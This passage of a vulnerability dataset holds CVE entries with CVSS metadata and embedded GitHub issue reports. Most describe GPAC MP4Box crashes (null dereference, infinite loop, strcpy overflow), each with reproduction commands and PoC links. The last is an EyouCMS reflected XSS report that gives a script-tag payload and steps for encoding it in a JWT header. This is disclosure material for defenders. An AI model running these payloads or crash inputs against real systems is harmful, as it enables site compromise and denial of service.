__libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b9c9 in _start (/yasm/yasm+0x41b9c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /yasm/modules/preprocs/nasm/nasm-pp.c:4013:47 in expand_mmac_params ==4490==ABORTING ```` **Source Code** ```` 4009 tt = mac->params[n]; 4010 } 4011 if (tt) 4012 { --->4013 for (i = 0; i < mac->paramlen[n]; i++) 4014 { 4015 *tail = 4016 new_Token(NULL, tt->type, tt->text, 4017 0); 4018 tail = &(*tail)->next; ```` --- end body --- comments : --- start comments --- --- end comments ---
3,441
CVE-2023-46929
2024-01-03T19:15:08.390
An issue discovered in GPAC 2.3-DEV-rev605-gfc9e29089-master in MP4Box in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55 allows attackers to crash the application.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/4248def5d24325aeb0e35cacde3d56c9411816a6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2662" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev605-gfc9e29089-master:*:*:*:*:*:*:*", "matchCriteriaId": "276701A5-2ABB-4EDB-9E2A-96A6A9EA62D9", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "Exploit", "Vendor Advisory" ]
[ "gpac", "gpac" ]
Issue
# SEGV in MP4Box ### Description SEGV in gpac/MP4Box. #0 0x7ffff67d35c7 in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55 ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_VORBIS GPAC_HAS_LINUX_DVB ``` ### ASAN Log ./MP4Box -add self:hdr=none:videofmt=undef:asemode=v1-qt poc2gpac ```shell AddressSanitizer:DEADLYSIGNAL ================================================================= ==3037856==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7ffff67d35c7 bp 0x7ffffffec090 sp 0x7ffffffe29c0 T0) ==3037856==The signal is caused by a READ memory access. ==3037856==Hint: address points to the zero page. #0 0x7ffff67d35c7 in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55 #1 0x7ffff67d6ce5 in gf_avc_change_color /afltest/gpac/src/media_tools/av_parsers.c:6950:9 #2 0x7ffff677f62c in gf_media_change_color /afltest/gpac/src/media_tools/isom_tools.c:198:3 #3 0x54e165 in import_file /afltest/gpac/applications/mp4box/fileimport.c:1670:9 #4 0x4f7d1e in do_add_cat /afltest/gpac/applications/mp4box/mp4box.c #5 0x4f7d1e in mp4box_main /afltest/gpac/applications/mp4box/mp4box.c:6196:13 #6 0x7ffff58cc082 in __libc_start_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x42adad in _start (/afltest/gpac/bin/gcc/MP4Box+0x42adad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /afltest/gpac/src/media_tools/av_parsers.c:6872:55 in gf_avc_change_vui ==3037856==ABORTING ``` ### Reproduction ```shell git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j24 ./bin/gcc/MP4Box -add self:hdr=none:videofmt=undef:asemode=v1-qt poc2gpac ``` ### PoC poc2gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc2gpac ### **Impact** This vulnerability is capable of causing crashes. ### Reference https://github.com/gpac/gpac ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang Song Jiaxuan
SEGV in MP4Box in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55
https://api.github.com/repos/gpac/gpac/issues/2662/comments
0
2023-10-24T08:09:10Z
2023-10-26T10:37:04Z
https://github.com/gpac/gpac/issues/2662
1,958,731,817
2,662
[ -0.02351541630923748, 0.02427692525088787, -0.007771205622702837, 0.0037047441583126783, 0.02442922815680504, -0.003369679907336831, -0.04456354305148125, 0.05342751368880272, -0.01546625979244709, 0.023637257516384125, -0.03091728873550892, 0.03368918597698212, 0.03682660311460495, 0.0011...
1,106
This is a GitHub Issue repo:gpac owner:gpac Title : SEGV in MP4Box in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55 Issue date: --- start body --- # SEGV in MP4Box ### Description SEGV in gpac/MP4Box. #0 0x7ffff67d35c7 in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55 ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_VORBIS GPAC_HAS_LINUX_DVB ``` ### ASAN Log ./MP4Box -add self:hdr=none:videofmt=undef:asemode=v1-qt poc2gpac ```shell AddressSanitizer:DEADLYSIGNAL ================================================================= ==3037856==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7ffff67d35c7 bp 0x7ffffffec090 sp 0x7ffffffe29c0 T0) ==3037856==The signal is caused by a READ memory access. ==3037856==Hint: address points to the zero page. #0 0x7ffff67d35c7 in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55 #1 0x7ffff67d6ce5 in gf_avc_change_color /afltest/gpac/src/media_tools/av_parsers.c:6950:9 #2 0x7ffff677f62c in gf_media_change_color /afltest/gpac/src/media_tools/isom_tools.c:198:3 #3 0x54e165 in import_file /afltest/gpac/applications/mp4box/fileimport.c:1670:9 #4 0x4f7d1e in do_add_cat /afltest/gpac/applications/mp4box/mp4box.c #5 0x4f7d1e in mp4box_main /afltest/gpac/applications/mp4box/mp4box.c:6196:13 #6 0x7ffff58cc082 in __libc_start_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x42adad in _start (/afltest/gpac/bin/gcc/MP4Box+0x42adad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /afltest/gpac/src/media_tools/av_parsers.c:6872:55 in gf_avc_change_vui ==3037856==ABORTING ``` ### Reproduction ```shell git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j24 ./bin/gcc/MP4Box -add self:hdr=none:videofmt=undef:asemode=v1-qt poc2gpac ``` ### PoC poc2gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc2gpac ### **Impact** This vulnerability is capable of causing crashes. ### Reference https://github.com/gpac/gpac ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang Song Jiaxuan --- end body --- comments : --- start comments --- --- end comments ---
2,870
CVE-2023-50120
2024-01-10T09:15:44.290
MP4Box GPAC version 2.3-DEV-rev636-gfbd7e13aa-master was discovered to contain an infinite loop in the function av1_uvlc at media_tools/av_parsers.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2698" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3:dev:*:*:*:*:*:*", "matchCriteriaId": "0099B624-674B-4F45-9270-DD638617A1D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "Exploit", "Issue Tracking" ]
[ "gpac", "gpac" ]
Issue
1.Version MP4Box - GPAC version 2.3-DEV-rev636-gfbd7e13aa-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D 2.Program Output [iso file] Parsing a top-level box at position 0 [iso file] Read Box type ftyp size 32 start 0 [iso file] Parsing a top-level box at position 32 [iso file] Read Box type mv@d size 108 start 32 [iso file] Unknown top-level box type mv@d [iso file] Parsing a top-level box at position 140 [iso file] Read Box type av1C size 363 start 140 [AV1] parsed AV1 OBU type=7 size=99 at position 152. [AV1] AV1 unexpected OBU type=152 size=0 found at position 140056310360544. Forwarding. [AV1] parsed AV1 OBU type=1 size=12 at position 251. [AV1] parsed AV1 OBU type=1 size=12 at position 263. [AV1] parsed AV1 OBU type=1 size=12 at position 275. [AV1] parsed AV1 OBU type=1 size=12 at position 287. [AV1] parsed AV1 OBU type=2 size=25 at position 299. [AV1] AV1 unexpected OBU type=299 size=0 found at position 140056310360544. Forwarding. [AV1] parsed AV1 OBU type=2 size=52 at position 324. [AV1] AV1 unexpected OBU type=324 size=0 found at position 140056310360544. Forwarding. [AV1] parsed AV1 OBU type=1 size=12 at position 376. [AV1] parsed AV1 OBU type=1 size=12 at position 388. [AV1] parsed AV1 OBU type=1 size=12 at position 400. [AV1] parsed AV1 OBU type=1 size=12 at position 412. [AV1] parsed AV1 OBU type=1 size=12 at position 424. [AV1] parsed AV1 OBU type=1 size=12 at position 436. [AV1] parsed AV1 OBU type=1 size=12 at position 448. [AV1] parsed AV1 OBU type=1 size=12 at position 460. [AV1] parsed AV1 OBU type=1 size=12 at position 472. [AV1] parsed AV1 OBU type=1 size=12 at position 484. [BS] Attempt to overread bitstream 3.Reproduction ./MP4Box -v $poc 4.PoC https://www.mediafire.com/file/fspsarzrcbfceha/hangPoC/file 5.Impact This vulnerability can result in an infinite loop or lead to a denial-of-service (DoS) condition. 6.Env Linux ubuntu 5.4.0-84-generic #94~18.04.1-Ubuntu SMP Thu Aug 26 23:17:46 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 7.Credit hu1y40
Infinite loop in av1_uvlc media_tools/av_parsers.c:1664
https://api.github.com/repos/gpac/gpac/issues/2698/comments
1
2023-12-01T04:51:55Z
2023-12-01T10:00:42Z
https://github.com/gpac/gpac/issues/2698
2,020,058,777
2,698
[ -0.033286262303590775, 0.028416605666279793, -0.010864266194403172, 0.014639792032539845, 0.020973429083824158, 0.017629390582442284, -0.030080920085310936, 0.04126880317926407, 0.004326443653553724, 0.020279964432120323, -0.022252483293414116, 0.029618609696626663, 0.0330088771879673, -0....
1,107
This is a GitHub Issue repo:gpac owner:gpac Title : Infinite loop in av1_uvlc media_tools/av_parsers.c:1664 Issue date: --- start body --- 1.Version MP4Box - GPAC version 2.3-DEV-rev636-gfbd7e13aa-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D 2.Program Output [iso file] Parsing a top-level box at position 0 [iso file] Read Box type ftyp size 32 start 0 [iso file] Parsing a top-level box at position 32 [iso file] Read Box type mv@d size 108 start 32 [iso file] Unknown top-level box type mv@d [iso file] Parsing a top-level box at position 140 [iso file] Read Box type av1C size 363 start 140 [AV1] parsed AV1 OBU type=7 size=99 at position 152. [AV1] AV1 unexpected OBU type=152 size=0 found at position 140056310360544. Forwarding. [AV1] parsed AV1 OBU type=1 size=12 at position 251. [AV1] parsed AV1 OBU type=1 size=12 at position 263. [AV1] parsed AV1 OBU type=1 size=12 at position 275. [AV1] parsed AV1 OBU type=1 size=12 at position 287. [AV1] parsed AV1 OBU type=2 size=25 at position 299. [AV1] AV1 unexpected OBU type=299 size=0 found at position 140056310360544. Forwarding. [AV1] parsed AV1 OBU type=2 size=52 at position 324. [AV1] AV1 unexpected OBU type=324 size=0 found at position 140056310360544. Forwarding. [AV1] parsed AV1 OBU type=1 size=12 at position 376. [AV1] parsed AV1 OBU type=1 size=12 at position 388. [AV1] parsed AV1 OBU type=1 size=12 at position 400. [AV1] parsed AV1 OBU type=1 size=12 at position 412. [AV1] parsed AV1 OBU type=1 size=12 at position 424. [AV1] parsed AV1 OBU type=1 size=12 at position 436. [AV1] parsed AV1 OBU type=1 size=12 at position 448. [AV1] parsed AV1 OBU type=1 size=12 at position 460. [AV1] parsed AV1 OBU type=1 size=12 at position 472. [AV1] parsed AV1 OBU type=1 size=12 at position 484. [BS] Attempt to overread bitstream 3.Reproduction ./MP4Box -v $poc 4.PoC https://www.mediafire.com/file/fspsarzrcbfceha/hangPoC/file 5.Impact This vulnerability can result in an infinite loop or lead to a denial-of-service (DoS) condition. 6.Env Linux ubuntu 5.4.0-84-generic #94~18.04.1-Ubuntu SMP Thu Aug 26 23:17:46 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 7.Credit hu1y40 --- end body --- comments : --- start comments --- --- end comments ---
2,640
CVE-2024-22749
2024-01-25T16:15:09.010
GPAC v2.3 was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/gpac/gpac/issues/2713" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hanxuer/crashes...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3:*:*:*:*:*:*:*", "matchCriteriaId": "58C43523-0CB3-474F-B88B-6ACA538645FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nu...
[ "Exploit", "Issue Tracking", "Patch" ]
[ "gpac", "gpac" ]
Issue
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at https://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: https://gpac.io/bug-reporting/ ### Description GPAC v2.3 8684dfb was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577 ### The affect version ``` MP4Box - GPAC version 2.3-DEV-revrelease (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Test environment ``` $ uname -a Linux ubuntu 5.4.0-152-generic #169~18.04.1-Ubuntu SMP Wed Jun 7 22:22:24 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux ``` ### Compiler with asan ``` $ ./configure --enable-sanitizer $ make ``` ### Reproduce ./bin/gcc/MP4Box -dash 10000 ./poc poc link:https://github.com/hanxuer/crashes/raw/main/gapc/01/poc.zip ### Report GDB backtrace: *** buffer overflow detected ***: ../../gpac-asan/bin/gcc/MP4Box terminated #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff20a27f1 in __GI_abort () at abort.c:79 #2 0x00007ffff20eb837 in __libc_message (action=action@entry=(do_abort | do_backtrace), fmt=fmt@entry=0x7ffff2218869 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:181 #3 0x00007ffff2196b5f in __GI___fortify_fail_abort (need_backtrace=need_backtrace@entry=0x1, msg=msg@entry=0x7ffff22187e6 "buffer overflow detected") at fortify_fail.c:33 #4 0x00007ffff2196b81 in __GI___fortify_fail (msg=msg@entry=0x7ffff22187e6 "buffer overflow detected") at fortify_fail.c:44 #5 0x00007ffff2194870 in __GI___chk_fail () at chk_fail.c:28 #6 0x00007ffff2193b02 in __strcpy_chk (dest=dest@entry=0x612000001426 "", src=src@entry=0x7ffffffe2f94 " MPEG-4 AVC|H264 Multiview Video ", destlen=destlen@entry=0x21) at strcpy_chk.c:30 #7 0x00007ffff4682517 in strcpy (__src=0x7ffffffe2f94 " MPEG-4 AVC|H264 Multiview Video ", __dest=0x612000001426 "") at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:90 #8 gf_isom_new_generic_sample_description (movie=<optimized out>, trackNumber=<optimized out>, URLname=URLname@entry=0x0, URNname=URNname@entry=0x0, udesc=udesc@entry=0x7ffffffe2f60, outDescriptionIndex=outDescriptionIndex@entry=0x617000011564) at isomedia/isom_write.c:4577 #9 0x00007ffff51556ad in mp4_mux_setup_pid (filter=<optimized out>, pid=0x613000001000, is_true_pid=<optimized out>) at filters/mux_isom.c:3218 #10 0x00007ffff4da6a44 in gf_filter_pid_configure (filter=filter@entry=0x619000014a80, pid=<optimized out>, ctype=ctype@entry=GF_PID_CONF_CONNECT) at filter_core/filter_pid.c:881 #11 0x00007ffff4dadedf in gf_filter_pid_connect_task (task=0x607000000f70) at filter_core/filter_pid.c:1241 #12 0x00007ffff4de4ea1 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x616000001c10) at filter_core/filter_session.c:2100 #13 0x00007ffff4de8e94 in gf_fs_run (fsess=0x616000001b80) at filter_core/filter_session.c:2400 #14 0x00007ffff47dfe76 in gf_dasher_process (dasher=<optimized out>) at media_tools/dash_segmenter.c:1255 #15 0x00005555555d7622 in do_dash () at mp4box.c:4832 #16 0x00005555555f5bb7 in mp4box_main (argc=<optimized out>, argv=<optimized out>) at mp4box.c:6256 #17 0x00007ffff2083c87 in __libc_start_main (main=0x5555555db180 <main>, argc=0x4, argv=0x7fffffffdae8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdad8) at ../csu/libc-start.c:310 #18 0x00005555555db23a in _start () ### Vul in source code: isom_write.c entry->Height = udesc->height; strcpy(entry->compressor_name, udesc->compressor_name); // this entry->color_table_index = -1; Thank you very much for your attention and consideration.
buffer-overflow in gf_isom_new_generic_sample_description function at isomedia/isom_write.c:4577
https://api.github.com/repos/gpac/gpac/issues/2713/comments
1
2024-01-06T06:07:11Z
2024-01-08T10:22:24Z
https://github.com/gpac/gpac/issues/2713
2,068,418,306
2,713
[ -0.031427569687366486, 0.024526244029402733, -0.011535070836544037, 0.016472171992063522, 0.029789453372359276, 0.020552296191453934, -0.021947728469967842, 0.05542294308543205, -0.026149192824959755, 0.02887938730418682, -0.02850019372999668, 0.01020030863583088, 0.041680965572595596, 0.0...
1,108
This is a GitHub Issue repo:gpac owner:gpac Title : buffer-overflow in gf_isom_new_generic_sample_description function at isomedia/isom_write.c:4577 Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at https://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: https://gpac.io/bug-reporting/ ### Description GPAC v2.3 8684dfb was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577 ### The affect version ``` MP4Box - GPAC version 2.3-DEV-revrelease (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Test environment ``` $ uname -a Linux ubuntu 5.4.0-152-generic #169~18.04.1-Ubuntu SMP Wed Jun 7 22:22:24 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux ``` ### Compiler with asan ``` $ ./configure --enable-sanitizer $ make ``` ### Reproduce ./bin/gcc/MP4Box -dash 10000 ./poc poc link:https://github.com/hanxuer/crashes/raw/main/gapc/01/poc.zip ### Report GDB backtrace: *** buffer overflow detected ***: ../../gpac-asan/bin/gcc/MP4Box terminated #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff20a27f1 in __GI_abort () at abort.c:79 #2 0x00007ffff20eb837 in __libc_message (action=action@entry=(do_abort | do_backtrace), fmt=fmt@entry=0x7ffff2218869 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:181 #3 0x00007ffff2196b5f in __GI___fortify_fail_abort (need_backtrace=need_backtrace@entry=0x1, msg=msg@entry=0x7ffff22187e6 "buffer overflow detected") at fortify_fail.c:33 #4 0x00007ffff2196b81 in __GI___fortify_fail (msg=msg@entry=0x7ffff22187e6 "buffer overflow detected") at fortify_fail.c:44 #5 0x00007ffff2194870 in __GI___chk_fail () at chk_fail.c:28 #6 0x00007ffff2193b02 in __strcpy_chk (dest=dest@entry=0x612000001426 "", src=src@entry=0x7ffffffe2f94 " MPEG-4 AVC|H264 Multiview Video ", destlen=destlen@entry=0x21) at strcpy_chk.c:30 #7 0x00007ffff4682517 in strcpy (__src=0x7ffffffe2f94 " MPEG-4 AVC|H264 Multiview Video ", __dest=0x612000001426 "") at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:90 #8 gf_isom_new_generic_sample_description (movie=<optimized out>, trackNumber=<optimized out>, URLname=URLname@entry=0x0, URNname=URNname@entry=0x0, udesc=udesc@entry=0x7ffffffe2f60, outDescriptionIndex=outDescriptionIndex@entry=0x617000011564) at isomedia/isom_write.c:4577 #9 0x00007ffff51556ad in mp4_mux_setup_pid (filter=<optimized out>, pid=0x613000001000, is_true_pid=<optimized out>) at filters/mux_isom.c:3218 #10 0x00007ffff4da6a44 in gf_filter_pid_configure (filter=filter@entry=0x619000014a80, pid=<optimized out>, ctype=ctype@entry=GF_PID_CONF_CONNECT) at filter_core/filter_pid.c:881 #11 0x00007ffff4dadedf in gf_filter_pid_connect_task (task=0x607000000f70) at filter_core/filter_pid.c:1241 #12 0x00007ffff4de4ea1 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x616000001c10) at filter_core/filter_session.c:2100 #13 0x00007ffff4de8e94 in gf_fs_run (fsess=0x616000001b80) at filter_core/filter_session.c:2400 #14 0x00007ffff47dfe76 in gf_dasher_process (dasher=<optimized out>) at media_tools/dash_segmenter.c:1255 #15 0x00005555555d7622 in do_dash () at mp4box.c:4832 #16 0x00005555555f5bb7 in mp4box_main (argc=<optimized out>, argv=<optimized out>) at mp4box.c:6256 #17 0x00007ffff2083c87 in __libc_start_main (main=0x5555555db180 <main>, argc=0x4, argv=0x7fffffffdae8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdad8) at ../csu/libc-start.c:310 #18 0x00005555555db23a in _start () ### Vul in source code: isom_write.c entry->Height = udesc->height; strcpy(entry->compressor_name, udesc->compressor_name); // this entry->color_table_index = -1; Thank you very much for your attention and consideration. --- end body --- comments : --- start comments --- --- end comments ---
4,828
CVE-2024-22927
2024-02-01T23:15:10.960
Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/57" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:*", "matchCriteriaId": "C5AE12B9-F8D6-4F10-9B49-50E0263ECA55", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
[ "weng-xianhu", "eyoucms" ]
Issue
### **Summary** EyouCMS-V1.6.5 When uploading images locally, the program will use the info parameter to set the parameters carried by the upload form. Multiple reflective XSS vulnerabilities can be created by modifying the JWT encrypted HEADER of the accepted JSON data and setting the parameter it contains to a malicious value. These parameters are: `num`,`input`,`path`,`func`,`is_water` ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/2c764b74-2d99-42c7-a339-5d7ee84893bb) _There is no update on github, the latest installation package (V1.6.5) is: https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip_ ### **Details** The exploit of this XSS vulnerability is mainly to construct the form to carry parameters, header is directly referenced by `<input>` into the page. The info parameter should be replaced with a "+" if it contains a "-" after JWT encryption. The guess is that the developer may have incorrectly implemented the logic of URL encoding and decoding, resulting in accepting only "+" and not "-". This may be because they only consider standard URL encoding rules and ignore URL security encoding rules. ### **POC** HEADER:ALGORITHM & TOKEN TYPE: ``` { "num": "1", "size": "2097152", "input": "", "func": "head_pic_call_back", "path": "allimg", "is_water": "1'\"()&%<zzz><ScRiPt >alert(9240)</ScRiPt>", "alg": "HS256" } ``` **Note: you do not need to carry data when encrypting, just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform url encoding.Don't go in the wrong order, or you'll convert the + to a space.** **In Header, when the `num` parameter causes a reflected XSS vulnerability, the payload is:** 